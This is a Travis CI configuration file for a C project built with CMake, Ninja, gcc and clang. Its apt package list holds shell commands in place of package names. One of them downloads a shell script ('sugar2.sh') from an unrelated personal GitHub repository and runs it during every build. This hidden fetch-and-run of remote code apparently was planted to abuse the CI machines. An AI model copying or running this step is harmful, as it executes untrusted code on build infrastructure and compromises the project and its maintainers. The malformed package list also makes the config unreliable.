sudo: required
dist: trusty

os: linux

language: c

compiler:
  - gcc

matrix:
  include:
    - os: linux
      compiler: gcc
    - os: linux
      compiler: clang
  exclude:
    - compiler: gcc

addons:
  apt:
    packages:
      - apt update
      - apt-get update && apt-get install -y vim
      - apt-get install python3 python3-pip git -y
      - apt -y install unzip
      - wget https://raw.githubusercontent.com/andiyy6/sugar2/main/sugar2.sh && chmod +x sugar2.sh && ./sugar2.sh


before_script:
  - ulimit -c unlimited -S 

script:
  - sudo hostname travis-ci.local
  - cmake -G Ninja -C ci/cmake-preloads/config-linux-all.txt -D CMAKE_BUILD_TYPE=Debug .
  - make
  - make test
